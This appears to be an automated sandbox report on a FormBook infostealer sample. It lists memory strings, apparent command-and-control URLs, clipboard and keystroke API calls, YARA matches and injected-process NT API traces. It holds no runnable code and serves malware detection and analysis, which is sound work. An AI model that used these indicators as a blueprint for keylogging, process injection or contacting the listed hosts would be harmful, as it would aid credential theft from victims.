Source: NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000004238000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: http://www.madhf.tech/vpqb/?40G=idKeckLAh2QIGB9KZJIRJS/oZMGdTwW1FjmI9FLM0wQU5zssjU3Tb8uAKfYmb7Pqyu/Q
Source: NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3721503493.000000000532C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.sitioseguro.blog
Source: NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3721503493.000000000532C000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.sitioseguro.blog/arvb/
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005AA4000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.0000000003F14000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: rasautou.exe, 0000000B.00000002.3712150364.0000000002831000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: rasautou.exe, 0000000B.00000003.1618442176.00000000076E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lolipop.jp/
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://pepabo.com/
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://static.minne.com/files/banner/minne_600x500
Source: rasautou.exe, 0000000B.00000002.3720366813.0000000005138000.00000004.10000000.00040000.00000000.sdmp, NkMjNSuuRDBHuZ.exe, 0000000D.00000002.3719949020.00000000035A8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
Source: rasautou.exe, 0000000B.00000002.3722263586.000000000770E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00686B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00686B0C

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00686D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00686D07

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

0_2_00686B0C

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00672B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00672B37

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3710085344.0000000000490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422627308.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719237360.00000000041C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3719398120.0000000004210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.3721503493.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1422984792.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3719141408.0000000002CE0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1423410145.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00633D19
Source: HN1GiQ5tF7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: HN1GiQ5tF7.exe, 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_a334fb0d-5
Source: HN1GiQ5tF7.exe, 00000000.00000002.1269593817.00000000006DE000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: fSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_bb95e442-7
Source: HN1GiQ5tF7.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_4a215a5d-8
Source: HN1GiQ5tF7.exe	String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_ec6ef543-8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042CDE3 NtClose,	2_2_0042CDE3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B60 NtClose,LdrInitializeThunk,	2_2_03472B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_03472DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_03472C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034735C0 NtCreateMutant,LdrInitializeThunk,	2_2_034735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474340 NtSetContextThread,	2_2_03474340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03474650 NtSuspendThread,	2_2_03474650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BE0 NtQueryValueKey,	2_2_03472BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BF0 NtAllocateVirtualMemory,	2_2_03472BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472B80 NtQueryInformationFile,	2_2_03472B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472BA0 NtEnumerateValueKey,	2_2_03472BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AD0 NtReadFile,	2_2_03472AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AF0 NtWriteFile,	2_2_03472AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472AB0 NtWaitForSingleObject,	2_2_03472AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F60 NtCreateProcessEx,	2_2_03472F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F30 NtCreateSection,	2_2_03472F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FE0 NtCreateFile,	2_2_03472FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472F90 NtProtectVirtualMemory,	2_2_03472F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FA0 NtQuerySection,	2_2_03472FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472FB0 NtResumeThread,	2_2_03472FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E30 NtWriteVirtualMemory,	2_2_03472E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EE0 NtQueueApcThread,	2_2_03472EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472E80 NtReadVirtualMemory,	2_2_03472E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472EA0 NtAdjustPrivilegesToken,	2_2_03472EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D00 NtSetInformationFile,	2_2_03472D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D10 NtMapViewOfSection,	2_2_03472D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472D30 NtUnmapViewOfSection,	2_2_03472D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DD0 NtDelayExecution,	2_2_03472DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472DB0 NtEnumerateKey,	2_2_03472DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C60 NtCreateKey,	2_2_03472C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472C00 NtQueryInformationProcess,	2_2_03472C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CC0 NtQueryVirtualMemory,	2_2_03472CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CF0 NtOpenProcess,	2_2_03472CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03472CA0 NtQueryInformationToken,	2_2_03472CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473010 NtOpenDirectoryObject,	2_2_03473010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473090 NtSetValueKey,	2_2_03473090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034739B0 NtGetContextThread,	2_2_034739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D70 NtOpenThread,	2_2_03473D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03473D10 NtOpenProcessToken,	2_2_03473D10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04474650 NtSuspendThread,LdrInitializeThunk,	11_2_04474650
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04474340 NtSetContextThread,LdrInitializeThunk,	11_2_04474340
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472C60 NtCreateKey,LdrInitializeThunk,	11_2_04472C60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472C70 NtFreeVirtualMemory,LdrInitializeThunk,	11_2_04472C70
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472CA0 NtQueryInformationToken,LdrInitializeThunk,	11_2_04472CA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472D10 NtMapViewOfSection,LdrInitializeThunk,	11_2_04472D10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472D30 NtUnmapViewOfSection,LdrInitializeThunk,	11_2_04472D30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472DD0 NtDelayExecution,LdrInitializeThunk,	11_2_04472DD0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472DF0 NtQuerySystemInformation,LdrInitializeThunk,	11_2_04472DF0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472EE0 NtQueueApcThread,LdrInitializeThunk,	11_2_04472EE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472E80 NtReadVirtualMemory,LdrInitializeThunk,	11_2_04472E80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472F30 NtCreateSection,LdrInitializeThunk,	11_2_04472F30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472FE0 NtCreateFile,LdrInitializeThunk,	11_2_04472FE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472FB0 NtResumeThread,LdrInitializeThunk,	11_2_04472FB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472AD0 NtReadFile,LdrInitializeThunk,	11_2_04472AD0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472AF0 NtWriteFile,LdrInitializeThunk,	11_2_04472AF0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472B60 NtClose,LdrInitializeThunk,	11_2_04472B60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472BE0 NtQueryValueKey,LdrInitializeThunk,	11_2_04472BE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	11_2_04472BF0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472BA0 NtEnumerateValueKey,LdrInitializeThunk,	11_2_04472BA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044735C0 NtCreateMutant,LdrInitializeThunk,	11_2_044735C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044739B0 NtGetContextThread,LdrInitializeThunk,	11_2_044739B0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472C00 NtQueryInformationProcess,	11_2_04472C00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472CC0 NtQueryVirtualMemory,	11_2_04472CC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472CF0 NtOpenProcess,	11_2_04472CF0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472D00 NtSetInformationFile,	11_2_04472D00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472DB0 NtEnumerateKey,	11_2_04472DB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472E30 NtWriteVirtualMemory,	11_2_04472E30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472EA0 NtAdjustPrivilegesToken,	11_2_04472EA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472F60 NtCreateProcessEx,	11_2_04472F60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472F90 NtProtectVirtualMemory,	11_2_04472F90
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472FA0 NtQuerySection,	11_2_04472FA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472AB0 NtWaitForSingleObject,	11_2_04472AB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04472B80 NtQueryInformationFile,	11_2_04472B80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04473010 NtOpenDirectoryObject,	11_2_04473010
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04473090 NtSetValueKey,	11_2_04473090
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04473D70 NtOpenThread,	11_2_04473D70
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04473D10 NtOpenProcessToken,	11_2_04473D10
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004B9800 NtCreateFile,	11_2_004B9800
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004B9970 NtReadFile,	11_2_004B9970
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004B9A60 NtDeleteFile,	11_2_004B9A60
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004B9B00 NtClose,	11_2_004B9B00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004B9C60 NtAllocateVirtualMemory,	11_2_004B9C60

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00676606: CreateFileW,DeviceIoControl,CloseHandle,

0_2_00676606

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0066ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_0066ACC5

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_006779D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_006779D3

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0065B043	0_2_0065B043
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00643200	0_2_00643200
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0066410F	0_2_0066410F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006502A4	0_2_006502A4
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0063E3E3	0_2_0063E3E3
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0066038E	0_2_0066038E
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0066467F	0_2_0066467F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006506D9	0_2_006506D9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0069AACE	0_2_0069AACE
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00664BEF	0_2_00664BEF
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0065CCC1	0_2_0065CCC1
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0063AF50	0_2_0063AF50
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00636F07	0_2_00636F07
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0064B11F	0_2_0064B11F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006931BC	0_2_006931BC
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0065D1B9	0_2_0065D1B9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0066724D	0_2_0066724D
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0065123A	0_2_0065123A
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006393F0	0_2_006393F0
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006713CA	0_2_006713CA
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0064F563	0_2_0064F563
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006396C0	0_2_006396C0
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0067B6CC	0_2_0067B6CC
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006377B0	0_2_006377B0
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_006679C9	0_2_006679C9
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0064FA57	0_2_0064FA57
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00639B60	0_2_00639B60
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00643B70	0_2_00643B70
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00637D19	0_2_00637D19
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0064FE6F	0_2_0064FE6F
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00659ED0	0_2_00659ED0
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_00637FA3	0_2_00637FA3
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_012F83E8	0_2_012F83E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418C93	2_2_00418C93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00403060	2_2_00403060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004010E0	2_2_004010E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004022C0	2_2_004022C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004022BA	2_2_004022BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004013B0	2_2_004013B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042F423	2_2_0042F423
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402428	2_2_00402428
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402430	2_2_00402430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004104A3	2_2_004104A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004106C3	2_2_004106C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004026F6	2_2_004026F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416E8F	2_2_00416E8F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416E93	2_2_00416E93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E743	2_2_0040E743
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402700	2_2_00402700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FA352	2_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344E3F0	2_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035003E6	2_2_035003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0274	2_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C02C0	2_2_034C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034C8158	2_2_034C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430100	2_2_03430100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DA118	2_2_034DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F81CC	2_2_034F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F41A2	2_2_034F41A2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035001AA	2_2_035001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D2000	2_2_034D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03464750	2_2_03464750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440770	2_2_03440770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343C7C0	2_2_0343C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345C6E0	2_2_0345C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440535	2_2_03440535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03500591	2_2_03500591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F2446	2_2_034F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E4420	2_2_034E4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EE4F6	2_2_034EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FAB40	2_2_034FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F6BD7	2_2_034F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343EA80	2_2_0343EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03456962	2_2_03456962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034429A0	2_2_034429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350A9A6	2_2_0350A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344A840	2_2_0344A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03442840	2_2_03442840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0346E8F0	2_2_0346E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034268B8	2_2_034268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B4F40	2_2_034B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03482F28	2_2_03482F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03460F30	2_2_03460F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E2F30	2_2_034E2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03432FC8	2_2_03432FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344CFE0	2_2_0344CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034BEFA0	2_2_034BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440E59	2_2_03440E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEE26	2_2_034FEE26
